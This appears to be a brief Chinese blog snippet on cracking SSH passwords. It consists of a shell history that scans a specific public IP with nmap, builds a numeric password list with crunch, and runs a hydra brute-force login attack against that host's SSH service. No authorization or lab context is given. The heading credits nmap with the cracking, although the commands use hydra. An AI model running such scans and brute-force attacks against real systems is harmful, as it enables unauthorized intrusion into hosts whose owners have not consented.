破解ssh密码

使用nmap对ssh密码进行破解

Bash
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
  228  2025-04-30 22:20:53 nmap -A -v -T4 114.55.147.180
  229  2025-04-30 22:26:17 cd
  230  2025-04-30 22:26:18 ls
  231  2025-04-30 22:27:00 crunch 6 6 123456 -o ~/passwd.txt
  232  2025-04-30 22:27:12 cat passwd.txt
  233  2025-04-30 22:27:20 clear
  234  2025-04-30 22:28:10 ls
  235  2025-04-30 22:28:21 vim user.txt
  236  2025-04-30 22:28:28 ls
  237  2025-04-30 22:29:10 hydra -L ~/user.txt -P ~/passwd.txt -vV -o ssh.log -e ns 114.55.147.180 ssh